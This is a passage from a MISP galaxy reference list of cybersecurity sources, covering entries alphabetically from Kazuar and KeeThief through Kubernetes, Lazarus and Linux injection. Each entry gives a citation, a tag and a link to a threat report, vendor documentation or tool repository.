Table 14145. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Citizen Lab Stealth Falcon May 2016

Marczak, B. and Scott-Railton, J. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="Citizen Lab Stealth Falcon May 2016"

Table 14146. Table References

Links

https://citizenlab.org/2016/05/stealth-falcon/

Github KeeThief

Lee, C., Schroeder, W. (n.d.). KeeThief. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="Github KeeThief"

Table 14147. Table References

Links

https://github.com/GhostPack/KeeThief

Kekeo

Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Kekeo"

Table 14148. Table References

Links

https://github.com/gentilkiwi/kekeo

Harmj0y Kerberoast Nov 2016

Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="Harmj0y Kerberoast Nov 2016"

Table 14149. Table References

Links

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

ADSecurity Kerberos Ring Decoder

Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="ADSecurity Kerberos Ring Decoder"

Table 14150. Table References

Links

https://adsecurity.org/?p=227

macOS kerberos framework MIT

Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="macOS kerberos framework MIT"

Table 14151. Table References

Links

http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html

Microsoft Kerberos Golden Ticket

Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.

The tag is: misp-galaxy:references="Microsoft Kerberos Golden Ticket"

Table 14152. Table References

Links

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

CERT-EU Golden Ticket Protection

Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="CERT-EU Golden Ticket Protection"

Table 14153. Table References

Links

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

AdSecurity Kerberos GT Aug 2015

Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.

The tag is: misp-galaxy:references="AdSecurity Kerberos GT Aug 2015"

Table 14154. Table References

Links

https://adsecurity.org/?p=1640

ADSecurity Kerberos and KRBTGT

Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="ADSecurity Kerberos and KRBTGT"

Table 14155. Table References

Links

https://adsecurity.org/?p=483

Microsoft Kerberos Preauth 2014

Sanyal, M. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.

The tag is: misp-galaxy:references="Microsoft Kerberos Preauth 2014"

Table 14156. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

Linux Kerberos Tickets

Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Linux Kerberos Tickets"

Table 14157. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html

Kernel Self Protection Project

Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Kernel Self Protection Project"

Table 14158. Table References

Links

https://www.kernel.org/doc/html/latest/security/self-protection.html

Rapid7 KeyBoy Jun 2013

Guarnieri, C., Schloesser, M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="Rapid7 KeyBoy Jun 2013"

Table 14159. Table References

Links

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

Keychain Items Apple Dev API

Apple. (n.d.). Keychain Items. Retrieved April 12, 2022.

The tag is: misp-galaxy:references="Keychain Items Apple Dev API"

Table 14160. Table References

Links

https://developer.apple.com/documentation/security/keychain_services/keychain_items

Keychain Services Apple

Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="Keychain Services Apple"

Table 14161. Table References

Links

https://developer.apple.com/documentation/security/keychain_services

Wikipedia keychain

Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Wikipedia keychain"

Table 14162. Table References

Links

https://en.wikipedia.org/wiki/Keychain_(software)

Keyctl-unmask

Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.

The tag is: misp-galaxy:references="Keyctl-unmask"

Table 14163. Table References

Links

https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/

Google Cloud Encryption Key Rotation

Google. (n.d.). Key rotation. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Google Cloud Encryption Key Rotation"

Table 14164. Table References

Links

https://cloud.google.com/kms/docs/key-rotation

KillDisk Ransomware

Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="KillDisk Ransomware"

Table 14165. Table References

Links

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

Trend Micro KillDisk 1

Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="Trend Micro KillDisk 1"

Table 14166. Table References

Links

https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html

Trend Micro KillDisk 2

Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.

The tag is: misp-galaxy:references="Trend Micro KillDisk 2"

Table 14167. Table References

Links

https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html

Killing IOS diversity myth

Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Killing IOS diversity myth"

Table 14168. Table References

Links

https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf

Killing the myth of Cisco IOS rootkits

Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Killing the myth of Cisco IOS rootkits"

Table 14169. Table References

Links

https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf

Vedere Labs Killnet 2022

Vedere Labs. (2022, June 2). Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group. Retrieved October 9, 2023.

The tag is: misp-galaxy:references="Vedere Labs Killnet 2022"

Table 14170. Table References

Links

https://www.forescout.com/resources/analysis-of-killnet-report/

Flashpoint Glossary Killnet

Flashpoint. (n.d.). Killnet: Inside the World’s Most Prominent Pro-Kremlin Hacktivist Collective. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Flashpoint Glossary Killnet"

Table 14171. Table References

Links

https://flashpoint.io/intelligence-101/killnet/

Malwarebytes Kimsuky June 2021

Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.

The tag is: misp-galaxy:references="Malwarebytes Kimsuky June 2021"

Table 14172. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

VirusBulletin Kimsuky October 2019

Kim, J. et al. (2019, October). KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING. Retrieved November 2, 2020.

The tag is: misp-galaxy:references="VirusBulletin Kimsuky October 2019"

Table 14173. Table References

Links

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/

EST Kimsuky April 2019

Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.

The tag is: misp-galaxy:references="EST Kimsuky April 2019"

Table 14174. Table References

Links

https://blog.alyac.co.kr/2234

ThreatConnect Kimsuky September 2020

ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.

The tag is: misp-galaxy:references="ThreatConnect Kimsuky September 2020"

Table 14175. Table References

Links

https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/

BRI Kimsuky April 2019

BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.

The tag is: misp-galaxy:references="BRI Kimsuky April 2019"

Table 14176. Table References

Links

https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/

Microsoft Klist

Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.

The tag is: misp-galaxy:references="Microsoft Klist"

Table 14177. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/klist

FireEye Know Your Enemy FIN8 Aug 2016

Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.

The tag is: misp-galaxy:references="FireEye Know Your Enemy FIN8 Aug 2016"

Table 14178. Table References

Links

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

Github Koadic

Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.

The tag is: misp-galaxy:references="Github Koadic"

Table 14179. Table References

Links

https://github.com/zerosum0x0/koadic

ESET Kobalos Feb 2021

M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="ESET Kobalos Feb 2021"

Table 14180. Table References

Links

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

Talos Konni May 2017

Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Konni May 2017"

Table 14181. Table References

Links

https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

Malwarebytes KONNI Evolves Jan 2022

Santos, R. (2022, January 26). KONNI evolves into stealthier RAT. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Malwarebytes KONNI Evolves Jan 2022"

Table 14182. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/

Talos Group123

Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos Group123"

Table 14183. Table References

Links

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

Kube Kubectl

kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Kubectl"

Table 14184. Table References

Links

https://kubernetes.io/docs/reference/kubectl/kubectl/

Kubernetes Kubelet

The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes Kubelet"

Table 14185. Table References

Links

https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/

Kubernetes CronJob

The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes CronJob"

Table 14186. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

Kubernetes Hardening Guide

National Security Agency, Cybersecurity and Infrastructure Security Agency. (2022, March). Kubernetes Hardening Guide. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Kubernetes Hardening Guide"

Table 14187. Table References

Links

https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF

Kubernetes Jobs

The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Kubernetes Jobs"

Table 14188. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/job/

Kubernetes Dashboard

The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes Dashboard"

Table 14189. Table References

Links

https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

Intezer App Service Phishing

Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Intezer App Service Phishing"

Table 14190. Table References

Links

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

Alintanahin 2014

Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Alintanahin 2014"

Table 14191. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/

Wits End and Shady PowerShell Profiles

DeRyke, A. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="Wits End and Shady PowerShell Profiles"

Table 14192. Table References

Links

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

NCC Group LAPSUS Apr 2022

Brown, D., et al. (2022, April 28). LAPSUS$: Recent techniques, tactics and procedures. Retrieved December 22, 2022.

The tag is: misp-galaxy:references="NCC Group LAPSUS Apr 2022"

Table 14193. Table References

Links

https://research.nccgroup.com/2022/04/28/lapsus-recent-techniques-tactics-and-procedures/

BBC LAPSUS Apr 2022

BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="BBC LAPSUS Apr 2022"

Table 14194. Table References

Links

https://www.bbc.com/news/technology-60953527

Enigma Excel DCOM Sept 2017

Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma Excel DCOM Sept 2017"

Table 14195. Table References

Links

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

Enigma Outlook DCOM Lateral Movement Nov 2017

Nelson, M. (2017, November 16). Lateral Movement using Outlook’s CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma Outlook DCOM Lateral Movement Nov 2017"

Table 14196. Table References

Links

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

Enigma MMC20 COM Jan 2017

Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma MMC20 COM Jan 2017"

Table 14197. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Enigma DCOM Lateral Movement Jan 2017

Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma DCOM Lateral Movement Jan 2017"

Table 14198. Table References

Links

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

Jacobsen 2014

Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell [slides]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Jacobsen 2014"

Table 14199. Table References

Links

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

Launchctl Man

SS64. (n.d.). launchctl. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Launchctl Man"

Table 14200. Table References

Links

https://ss64.com/osx/launchctl.html

LaunchDaemon Hijacking

Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="LaunchDaemon Hijacking"

Table 14201. Table References

Links

https://bradleyjkemp.dev/post/launchdaemon-hijacking/

launchd Keywords for plists

Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.

The tag is: misp-galaxy:references="launchd Keywords for plists"

Table 14202. Table References

Links

https://www.real-world-systems.com/docs/launchdPlist.1.html

Launch Services Apple Developer

Apple. (n.d.). Launch Services. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Launch Services Apple Developer"

Table 14203. Table References

Links

https://developer.apple.com/documentation/coreservices/launch_services

Launch Service Keys Developer Apple

Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Launch Service Keys Developer Apple"

Table 14204. Table References

Links

https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1

Launch-VsDevShell.ps1 - LOLBAS Project

LOLBAS. (2022, June 13). Launch-VsDevShell.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Launch-VsDevShell.ps1 - LOLBAS Project"

Table 14205. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/

MalwareBytes Lazarus-Andariel Conceals Code April 2021

Jazi, H. (2021, April 19). Lazarus APT conceals malicious code within BMP image to drop its RAT. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="MalwareBytes Lazarus-Andariel Conceals Code April 2021"

Table 14206. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/

Lazarus RATANKBA

Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="Lazarus RATANKBA"

Table 14207. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/

ATT Lazarus TTP Evolution

Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="ATT Lazarus TTP Evolution"

Table 14208. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution

TrendMicro Lazarus Nov 2018

Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.

The tag is: misp-galaxy:references="TrendMicro Lazarus Nov 2018"

Table 14209. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

F-Secure Lazarus Cryptocurrency Aug 2020

F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.

The tag is: misp-galaxy:references="F-Secure Lazarus Cryptocurrency Aug 2020"

Table 14210. Table References

Links

https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf

ESET Lazarus KillDisk April 2018

Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="ESET Lazarus KillDisk April 2018"

Table 14211. Table References

Links

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

Lazarus KillDisk

Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="Lazarus KillDisk"

Table 14212. Table References

Links

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

McAfee Lazarus Resurfaces Feb 2018

Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="McAfee Lazarus Resurfaces Feb 2018"

Table 14213. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/

Kaspersky ThreatNeedle Feb 2021

Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.

The tag is: misp-galaxy:references="Kaspersky ThreatNeedle Feb 2021"

Table 14214. Table References

Links

https://securelist.com/lazarus-threatneedle/100803/

Kaspersky Lazarus Under The Hood Blog 2017

GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Kaspersky Lazarus Under The Hood Blog 2017"

Table 14215. Table References

Links

https://securelist.com/lazarus-under-the-hood/77908/

Kaspersky Lazarus Under The Hood APR 2017

GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Kaspersky Lazarus Under The Hood APR 2017"

Table 14216. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

Secureworks Emotet Nov 2018

Mclellan, M. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Secureworks Emotet Nov 2018"

Table 14217. Table References

Links

https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader

MalwareBytes LazyScripter Feb 2021

Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.

The tag is: misp-galaxy:references="MalwareBytes LazyScripter Feb 2021"

Table 14218. Table References

Links

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Ldifde.exe - LOLBAS Project

LOLBAS. (2022, August 31). Ldifde.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ldifde.exe - LOLBAS Project"

Table 14219. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ldifde/

Ldifde Microsoft

Microsoft. (2016, August 31). Ldifde Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Ldifde Microsoft"

Table 14220. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

Symantec Leafminer July 2018

Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.

The tag is: misp-galaxy:references="Symantec Leafminer July 2018"

Table 14221. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

Proofpoint TA505 Mar 2018

Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Mar 2018"

Table 14222. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

Medium DnsTunneling

Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Medium DnsTunneling"

Table 14223. Table References

Links

https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000

Learn XPC Exploitation

Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Learn XPC Exploitation"

Table 14224. Table References

Links

https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/

ClearSky Lebanese Cedar Jan 2021

ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ClearSky Lebanese Cedar Jan 2021"

Table 14225. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Mandiant UNC3313 Feb 2022

Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Mandiant UNC3313 Feb 2022"

Table 14226. Table References

Links

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

LemonDuck

Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.

The tag is: misp-galaxy:references="LemonDuck"

Table 14227. Table References

Links

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

Twitter Leoloobeek Scheduled Task

Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Twitter Leoloobeek Scheduled Task"

Table 14228. Table References

Links

https://twitter.com/leoloobeek/status/939248813465853953

Let’s Encrypt FAQ

Let’s Encrypt. (2020, April 23). Let’s Encrypt FAQ. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Let’s Encrypt FAQ"

Table 14229. Table References

Links

https://letsencrypt.org/docs/faq/

OSX Malware Detection

Patrick Wardle. (2016, February 29). Let’s Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="OSX Malware Detection"

Table 14230. Table References

Links

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

xorrior emond Jan 2018

Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="xorrior emond Jan 2018"

Table 14231. Table References

Links

https://www.xorrior.com/emond-persistence/

Cyberreason DCOM DDE Lateral Movement Nov 2017

Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Cyberreason DCOM DDE Lateral Movement Nov 2017"

Table 14232. Table References

Links

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

Proofpoint Leviathan Oct 2017

Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Proofpoint Leviathan Oct 2017"

Table 14233. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

LIBC

Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="LIBC"

Table 14234. Table References

Links

https://man7.org/linux/man-pages//man7/libc.7.html

libzip

D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="libzip"

Table 14235. Table References

Links

https://libzip.org/

Symantec Darkmoon Sept 2014

Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Symantec Darkmoon Sept 2014"

Table 14236. Table References

Links

https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign

Wikipedia LLMNR

Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Wikipedia LLMNR"

Table 14237. Table References

Links

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

IzyKnows auditd threat detection 2022

IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="IzyKnows auditd threat detection 2022"

Table 14238. Table References

Links

https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505

Fysbis Dr Web Analysis

Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Fysbis Dr Web Analysis"

Table 14239. Table References

Links

https://vms.drweb.com/virus/?i=4276269

GDSecurity Linux injection

McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="GDSecurity Linux injection"

Table 14240. Table References

Links

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

GDS Linux Injection

McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.

The tag is: misp-galaxy:references="GDS Linux Injection"

Table 14241. Table References

Links

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

Linux/Cdorked.A We Live Security Analysis

Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.

The tag is: misp-galaxy:references="Linux/Cdorked.A We Live Security Analysis"

Table 14242. Table References

Links

https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/

Avast Linux Trojan Cron Persistence

Threat Intelligence Team. (2015, January 6). Linux DDoS Trojan hiding itself with an embedded rootkit. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Avast Linux Trojan Cron Persistence"

Table 14243. Table References

Links

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

BH Linux Inject

Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="BH Linux Inject"

Table 14244. Table References

Links

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

PAM Backdoor

zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.

